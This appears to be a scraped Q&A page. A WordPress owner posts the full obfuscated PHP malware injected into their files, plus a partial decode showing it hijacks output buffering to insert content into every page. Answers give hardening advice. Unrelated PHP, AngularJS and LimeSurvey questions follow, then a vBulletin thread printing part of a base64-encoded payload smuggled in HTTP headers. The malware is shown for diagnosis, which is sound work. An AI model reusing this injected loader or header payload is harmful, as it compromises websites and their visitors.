wordpress are injected some code snippets - php
I found all of php files of my wordpress are injected some code snippets in front of the files.
<?php
$ipdcnbaium = '5c%x78256<^#zsfvr#%x5c%x785cq7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz]y74]273]y76]252]y85]256]y6g]257]78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWt%x7860gvodujpo)##-!#~<#%x5c%x77825)}.;%x5c%x7860UQPc%x787f!>>%x5c%x7822!pd%x5c%x7825m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x782x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x5tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%c%x7825j=tj{fpg)%x5c%x7825%4]y76#<%x5c%x7825tmw!>!#]y84]275]y824*<!%x5c%x7824-%x5c%x7824gx7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x78f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x786GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%{hnpd!opjudovg!|!**#j{hnpd#)tutjyf)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x78275hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbc%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x773:8297f:5297e:56-%x5c%x7878r.985:52985-t.9%x5c%x7860opjudovg%x5c%x7822)!gj}x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c83]273]y76]277#<%x5c%x7825t2w>#%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%xY%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset($GLc%x7824]y8%x5c%x7824-%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwx782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)#57]38y]47]67y]37]88y]27]5c%x7825))!gj!<*#cd2bge56,47R57,27R66,#%x5c%x782fq%x5c%x7825>ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x782582f%x5c%x7825%x5c%x7825c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI2]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#76248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]uhofm%x5c%x7825:-5ppdex7825!<*#}_;#)323ldfid>}&;%x5c%x7825:osvufs:~92x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>hIr%x5c%x785c1^-%x5c%x7825r%xc%x7825r%x5c%x7878<~!!%x5c%x7825c%x785c2^-%x5c%x7826*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<1]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7828257-MSV,6<*)ujojR%x5c%x7827id%x5ck#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]27{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825opmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j2f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]27%x7825s:%x5c%x785c%x5c%x78#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|9]78]K5]53]Kc#<%x5c%x7825tpz!>-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-E%x5c%x78257%x5c%x782f7###7%x5c%x782f7^x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GOy3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5"%x61%156%x75%156%x61"]=1x5c%x7827pd%x5c%x78256<pdx5c%x7825-#+I#)q%x5cy33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]6225kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfeb8>>%x5c%x7822:ftmbg39*565c%x7827{**u%x5c%x7825-#jt0t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!8]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%5z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wc%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zeUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7828y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%; function fjfgg($n){return chr(ord($n)-]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", 860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%25!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x782!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x782%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x77jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5cfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd5tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5825w6Z6<.5%x5c%x7860hA%x5c%x7827ppn)%x5c%x7825epnbss-%x5c%x7825r%x5c%25j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:}Z;0]=]0#)2q%x5c%x7825l}S;2-u#iubq#%x5c%x785cq%x5c%x7821);} #error_reporting(0); preg_replacex78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]OBALS["%x61%156%x75%156%x61"])))) { $GLOBALS[5s:N}#-%x5c%x7825o:W%x5c%x78257825)sutcvt)esp>hmg%x5c%x7825!<5%x5c%x7827jsv%x5c%x81]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7860%x5c%x7825}X;!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%xx5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x25z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7x7825!)!gj!<2,*j%x5c%x7825!-#1]#-b4-%x5c%x7824!>!fyqmpef5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9e!-#jt0*?]+^?]_%x5c%x785c}:4:|:**#ppde#)tutjyf%x5c%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)f%x5c%x7825ggg!>!#]y81]273]y8pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*bepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y#-#L#-#M#-#[#-#Y#-#D#-#W7824-%x5c%x7824-tusqpt)%x5c%x78b!-#}#)fepmqnj!%x5c%x782f!#0#)id!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7812>j%x5c%x7825!|!*#91y]825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5825)!>>%x5c%x7822!ftmbg)!gj<*#Y%x5c%x78257;utpI#7>%x}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[7860%x5c%x7878%x5c%x7822l:!}V;3q%x5%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x!osvufs}%x5c%x787f;!opjudovg}k~~9{d1^W%x5c%x7825c!>!%x5c%x7825i%xjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssNULL); })!gj}Z;h!opjudovg}{;274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uy5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x0FUPNFS&d_SFSFGFS%x5c%x7860Q#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc9y]g2y]#>>*4-1-bubE{h%x5]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]3!osvufs!*!+A!>!{e%x5c%x725j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5cMSVD!-id%x5c%x7825)uqpuft%x5c%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x517,67R37,#%x5c%x782fq%x5c%x7825>U<#1Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%xx7878W~!Ypp2)%x5c%x7825zBz-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825%x5c%x7825tww**WYsboepn)%x5c%x7825b%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboe)sutcvt)fubmgoj{hA!osvuf439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:i)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x70LDPT7-UFOJ%x5c%x7860g:74985-rr.93e:5597f-s.9c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7Rc%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]2X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%165]y83]248]y83]256]y81]265]y72]25#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7878256<C>^#zsfvr#%x5c%x785cq%xps)%x5c%x7825j>1<%x56]234]342]58]24]31#-%x5c%x7825tdd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7z*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x52q%x5c%x7825<#g6R85,67R37,5:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]47ubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&SA:>:8:|:7#6#)tutjyf%x5c%x7860Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c4-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786y86]267]y74]275]y7:]268]y7f#<!%x5c%x782827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc)#]341]88M4P8]37]278]2254l}%x5c%x7827;%x5c%7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7pc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x%x78256<%x5c%x787fw6*%x5c%xCW&)7gj6<.[A%x5c%x7827&6<%x5c%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827%x5c%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%xubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787ss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K6+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&%x787fw6<*K)ftpmdXA6|7**197-2qj%x5R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-s!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%fu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827kc:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-0%x28%42%x66%152%x66%147%x67%42/(.*)/epreg_replacecawmpmsvdd';
$iizkegwpep = explode(chr((159-115)),'1520,70,4940,45,3179,25,3857,40,4841,38,5381,48,8214,69,10075,31,7231,69,5872,44,3141,38,4381,51,4674,33,8438,39,3937,61,3204,25,4579,41,5676,38,1174,44,8968,49,8136,37,2916,51,4879,61,6505,22,1866,44,4432,50,9786,34,8859,70,7771,21,825,67,5429,44,2526,68,0,29,3033,38,4815,26,5046,20,8357,29,5636,40,926,56,1421,59,2219,40,5916,45,6103,41,6903,42,171,47,4482,37,9820,51,7715,56,2323,34,9299,27,5333,48,9326,29,676,63,7381,63,1480,40,248,21,7202,29,8527,43,7816,63,269,33,6780,20,2768,68,1804,40,7598,24,9871,52,5580,34,8637,38,5194,35,9355,65,4121,51,2403,39,557,68,6945,53,5015,31,6412,23,7056,24,8173,41,892,34,1261,33,8068,68,3071,70,4620,54,1116,58,2090,49,6034,69,9420,43,9463,69,5831,41,1612,68,6729,43,6247,32,9532,55,5988,46,1743,24,9723,63,789,36,6998,28,3758,49,3998,60,9017,67,6853,50,9923,68,7300,45,5174,20,3596,48,1680,38,9144,20,2043,26,6664,35,2069,21,3452,24,8736,29,7622,56,2021,22,5805,26,126,45,2483,43,7139,24,6475,30,2357,46,8675,61,7879,69,7345,36,1767,37,8570,26,3404,48,5473,47,6570,35,3711,47,9229,70,3476,27,4786,29,1048,68,5779,26,8018,50,6800,53,2442,41,8283,32,495,34,1329,31,93,33,8929,39,4519,60,2866,50,1718,25,3807,50,3229,20,4344,37,302,69,8596,41,1910,63,625,51,3503,53,5229,51,2704,38,2259,64,8798,61,4228,59,6605,59,6216,31,5520,60,6435,40,1590,22,371,56,9164,65,529,28,8386,20,468,27,1294,35,218,30,1844,22,5614,22,7678,37,6144,48,4287,57,5280,53,6699,30,9084,37,7543,55,4707,36,7444,25,2967,66,7469,39,2139,29,2199,20,982,66,7508,35,9587,68,7792,24,1218,43,3556,40,9655,68,2836,30,6279,63,4058,63,427,41,5714,65,6527,43,1360,61,29,64,9121,23,7080,59,5066,64,8406,32,8477,50,4172,56,2168,31,4985,30,9991,34,2594,70,6342,70,7163,39,2742,26,4743,43,8765,33,739,50,2664,40,3644,67,3338,66,10025,50,7026,30,6192,24,8315,42,3305,33,5961,27,5130,44,7948,70,1973,48,3249,56,3897,40,6772,8');
$emohrydhhi=substr($ipdcnbaium,(43064-32958),(46-39));
if (!function_exists('efccfhrtgn')) {
function efccfhrtgn($lvbeusmjag, $likewwohuf) {
$bofyjhslnr = NULL;
for($wymmotluwp=0;$wymmotluwp<(sizeof($lvbeusmjag)/2);$wymmotluwp++) {
$bofyjhslnr .= substr($likewwohuf, $lvbeusmjag[($wymmotluwp*2)],$lvbeusmjag[($wymmotluwp*2)+1]);
} return $bofyjhslnr;
};
}
$anjiklzunk="\x20\57\x2a\40\x67\166\x66\162\x70\151\x78\145\x74\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\61\x31\55\x37\64\x29\51\x2c\40\x63\150\x72\50\x28\62\x38\70\x2d\61\x39\66\x29\51\x2c\40\x65\146\x63\143\x66\150\x72\164\x67\156\x28\44\x69\151\x7a\153\x65\147\x77\160\x65\160\x2c\44\x69\160\x64\143\x6e\142\x61\151\x75\155\x29\51\x29\73\x20\57\x2a\40\x78\147\x76\157\x66\163\x6b\147\x6f\146\x20\52\x2f\40";
$xmtobffgzh=substr($ipdcnbaium,(35930-25817),(80-68));
$xmtobffgzh($emohrydhhi, $anjiklzunk, NULL);
$xmtobffgzh=$anjiklzunk;
$xmtobffgzh=(818-697);
$ipdcnbaium=$xmtobffgzh-1; ?>
it seems like some encrypted php codes. So I tried decrypted it Here, then I got
<?php
function __lambda_func()
{
};
if (!function_exists("pa22")) {
function pa22($v)
{
Header("Content-Encoding: none");
$p = "\x70\162\x65\147\x5f";
$p1 = $p . "\155\x61\164\x63\150";
$p2 = $p . "\162\x65\160\x6c\141\x63\145";
$t = dcoo($v);
if ($p1("/\<\/body/si", $t)) {
return $p2("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
}
else {
if ($p1("/\<\/html/si", $t)) {
return $p2("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
}
else {
return $t;
}
}
}
}
ob_start("pa22"); //}
I had reinstalled my wordpress several months ago. But it comes again now. My wordpress is the newest version(3.9.1).
my question is
how did those snippets inject into php files?
what are the snippets going to do?
Its seems like a 3rd party injunction. This kinds of attacks are common in wordpress. Please take some security measures after cleaning the inject codes. Disable the edit permission and use some security plugins like file file-monitor-plus and wordfence
Definitely a hack attempt. Probably not targeted to your own site, but you should clear all these things, since they may quickly eat up your hosting resources (CPU, Memory,IO).
My advice is after clearing them, disable WP's ability to edit files through the dashboard and set permissions to critical files (config, index etc) to something like 0400 or 0440.
The way they get there varies, but in most cases the guy who did this used some known PHP (or other) exploit, which your webhost has not patched yet...
Related
PHP - URL gets malformed during redirect
So, I have an image link that has this href:
http://www.app.com/link?target=www.target.com¶m1=abc¶m2=xyz
This is processed like so (I use laravel):
function out (Request $request) {
$url = $request->target;
$qs = $request->except('target');
if ( !empty($qs) ) {
$url .= strpos($url, '?') !== false ? '&' : '?';
$url .= http_build_query($qs);
}
return redirect($url);
}
Most of the time, this works. However, lately, we've been experiencing an issue where param1 and param2 are attached to the URL in a seemingly infinite loop causing us to hit a 414 Request URI too long Error.
The problem is that it happens so randomly that I really don't know where to check because I added a checker before the return statement.
if ( substr_count($url, 'param1') > 1 ) {
$file = storage_path() . '/logs/logger.log';
$log = "[ " . date("d-m-Y H:i:sa") . " ] [ {$request->ip()} ] - {$url} \n";
file_put_contents($file, $log, FILE_APPEND);
}
And it hasn't logged a single hit. Even after our testers experienced the bug.
Is it possible that the receiving application is breaking the URL somehow?
What information should I be looking out for? Have you seen an issue like this before?
Is it the http_build_query that could be causing this and that my checker just doesn't work as expected (though, I did test it and it logged my test URL).
Any help on the matter would be great.
Assuming and issue with http_build_query:
Well, one attempt you may try is to rewrite the code without $request->except and http_build_query.
If you don't have any special reason to use http_build_query i would suggest to use $request->input.
Example with $request->input:
function out (Request $request) {
$url = $request->target;
$param1 = $request->input('param1', '');
$param2 = $request->input('param2', '');
if (!empty($param1) || !empty($param2)) {
$url .= '?';
}
if (!empty($param1) && !empty($param2)) {
$url .= 'param1=' . $param1 . '¶m2=' . $param2;
} else {
$url .= !empty($param1) 'param1=' . $param1 : '';
$url .= !empty($param2) 'param2=' . $param2 : '';
}
return redirect($url);
}
The solution is a little bit more verbose but with that, you should be sure 100% that is not the code to generate the redundancy.
Absurd, remote possibility:
The second thing I would try is to check you log system. For instance if you are running under apache you should have a file called access.log under /var/log/apache2/ (or under /var/log/nginx/ with nginx).
In there you should have the history of all your http requests.
Maybe there is a chance that some of the wired requests with multiple params are from a strange IP address.
If this is the case, it means that some company is monitoring and testing the website (potentially with the strange parameters) for security reasons.
If this is the case, I guess you are under http and you should switch to https.
Anyway, with the new code, you should be sure about the code and be able to investigate any other part of the system.
ng-view outside of index file
I am building a project for a client who has a php site, there is a file that has "template functions". ...so basically, the person has different HTML pages wrapped inside of PHP functions. I need to build a template inside of this person's weird site and I REALLY want to use AngularJs. So at the top of the file is all this stuff, which not exactly sure what it is doing but basically setting where the site is and what template to use.
My question - I am getting Error: $injector:modulerr
Module Error. My Angularjs code is fine I am pretty sure. I have ng-app, and ng-view..just basic stuff in place. Does anyone know possibilities why I am getting this error? I am thinking it must have something to do with this wacky server/php setup. Also any ideas to make it work?
Inside of the php function that loads the template for the site what looks like a basic HTML file with ng-app on the html tags and and ng-view div.
if(!isset($_SESSION)){ session_start(); }
function setup_path_massage(){
if (substr_count($_SERVER['SERVER_NAME'],".") == 1){
$domref = "www." . $_SERVER['SERVER_NAME'] ; }
else {
$domref = $_SERVER['SERVER_NAME'] ; }
list($host,$domain,$ext) = split("\.",$domref);
$domain .= "." . $ext;
$_SESSION['settings']['domain'] = $domain;
#################
if (isset($_SERVER['SUBDOMAIN_DOCUMENT_ROOT'])){
$orig_path_info = realpath($_SERVER['SUBDOMAIN_DOCUMENT_ROOT']);
$pos = strpos($orig_path_info, '/shop/');
}
else {
$orig_path_info = realpath($_SERVER['DOCUMENT_ROOT']);
$pos = strpos($orig_path_info, '/shop/');
}
$shop_path = substr($orig_path_info, 0, $pos)."/shop/";
$Zend_path = $shop_path . 'Zend/library/';
$version = 'v' . substr($orig_path_info, $pos + 7, strpos($orig_path_info, '/', $pos + 7) - ($pos + 7));
set_include_path($shop_path.$version.'/:'.$Zend_path);
return array ($host,$domain);
}
list($host,$domain) = setup_path_massage();
Ok, I was just spazzing out. ...I forgot to attach angular-routes.js and was trying to set up routes.
Yii::app()->lang doesn't work sometimes with LimeSurvey
I am working on a custom script to automatically send out invites and reminders. I have everything working fine up until a point. My function to send invites looks like this:
function sendInvites($iSurveyID) {
$oSurvey = Survey::model()->findByPk($iSurveyID);
if (!isset($oSurvey)) {
die("could not load survey");
}
if(!tableExists("{{tokens_$iSurveyID}}")) {
die("survey has no tokens or something");
}
$SQLemailstatuscondition = "emailstatus = 'OK'";
$SQLremindercountcondition = '';
$SQLreminderdelaycondition = '';
$iMaxEmails = (int)Yii::app()->getConfig("maxemails");
$iMaxReminders = 1;
if(!is_null($iMaxReminders)) {
$SQLremindercountcondition = "remindercount < " . $iMaxReminders;
}
$oTokens = Tokens_dynamic::model($iSurveyID);
$aResultTokens = $oTokens->findUninvited(false, $iMaxEmails, true, $SQLemailstatuscondition, $SQLremindercountcondition, $SQLreminderdelaycondition);
if (empty($aResultTokens)) {
die("No tokens to send invites to");
}
$aResult = emailTokens($iSurveyID, $aResultTokens, 'invite');
}
I also have a simple little file that starts up Yii:
Yii::createApplication('LSYii_Application', APPPATH . 'config/config' . EXT);
Yii::app()->loadHelper('admin/token');
Yii::app()->loadHelper('common');
Everything works as expected up until I actually try to send emails to the tokens. I've tracked the problem down to the following, on of the functions called by emailTokens has this in it:
$clang = Yii::app()->lang;
$aBasicTokenFields=array('firstname'=>array(
'description'=>$clang->gT('First name'),
'mandatory'=>'N',
'showregister'=>'Y'
),
The Yii::app()->lang part seems to be causing issues because then php is unable to call the gT method. However, when LimeSurvey is running "properly" this never happens. I can't even seem to find where "lang" is in the LimeSurvey source.
What can I do to make it work?
Why do you make it so hard on yourself and not use the RemoteControl2 API ? See http://manual.limesurvey.org/wiki/RemoteControl_2_API#invite_participants On that page you will also find a PHP example script.
maybe
Yii::import('application.libraries.Limesurvey_lang');
$clang = new Limesurvey_lang($oTokens->language);
HTTP-SOVIET and HTTP-PACK?
I found a couple vBulletin sites I administer getting hacked recently. They use the latest version of the 3.8 series (3.8.7 Patch Level 2). I am usually pretty good at finding the holes where they get in and patching them up, but this one is stumping me. They are injecting data into the MySQL tables. The attack always happens when they make a GET request to the faq.php script. I was able to save data when the attack occurs. This was the $_REQUEST, $_GET, $_POST, $_COOKIE, and $_SERVER arrays. The only thing I saw that looked out of place is that there were two new $_SERVER keys, HTTP_SOVIET and HTTP_PACK: http://pastebin.com/b6WdZtfK I have to assume this is the root of the issue, but I cannot for the life of me figure out how the attacker can set this variable. There is nothing in the request string, nothing in the cookie array, it is a GET request, not POST. Any idea?
A variable like $_SERVER['HTTP_*'] can set by just adding headers to the HTTP request.
A simple command line example would be:
PHP Page:
print_r($_SERVER);
Then on command line:
curl --header "SOVIET: 123" localhost
You'll see that $_SERVER['HTTP_SOVIET'] is equal to 123.
In this case, the contents of HTTP_SOVIET are base64 encoded (give away, it ends in ==).
Unencoded, it turns into:
function iai() {
global $db;
$base = base64_decode('JExLZ1RMSEs9KCRPX3JaeGw9IlxceDYyIi4iXFx4NjEiLiJcXHg3MyIuIlxceDY1Ii4iXFx4MzYiLiJcXHgzNCIuIlxceDVmIi4iXFx4NjQiLiJcXHg2NSIuIlxceDYzIi4iXFx4NmYiLiJcXHg2NCIuIlxceDY1ImFuZCRldFZKT1ZPPSJcXHg3MCIuIlxceDcyIi4iXFx4NjUiLiJcXHg2NyIuIlxceDVmIi4iXFx4NzIiLiJcXHg2NSIuIlxceDcwIi4iXFx4NmMiLiJcXHg2MSIuIlxceDYzIi4iXFx4NjUiKT9AJGV0VkpPVk8oIlxceDJmXFx4MmVcXHgyZlxceDY5XFx4NjUiLCRPX3JaeGwoIlFHVjJZV3dvWW1GelpUWTBYMlJsWTI5a1pTZ25XbTVXZFZrelVuQmlNalJuVTBkU01GRnRiRWhXUlVaNVMwTnJaMlYzTUV0YU1uaDJXVzFHYzBsRFVuQmpSamswVDNjd1MwcEhXbkJpUjFabVdrTkJPVWxEWTNaa1J6RjNURE5DYjJOR2JGTlpNRTVEWWxWS2VVcDZjMDVEYVZKd1kwWTVjMGxFTUdkTFNFNHdZMjFzZFZwNWJIQmpSRXB6WWpJMWJrdERVbkJqUmprMFMxUnpUa050YkcxTFIxcHdZa2RXWmxwWWFIQmpNMUo2UzBOU2JXRlhlR3hZTWxGd1NVZEdkVnBEUWtGaFdFNW1aRE5LY0dSSFJtbGlSMVZ2U2tkYWNHSkhWbV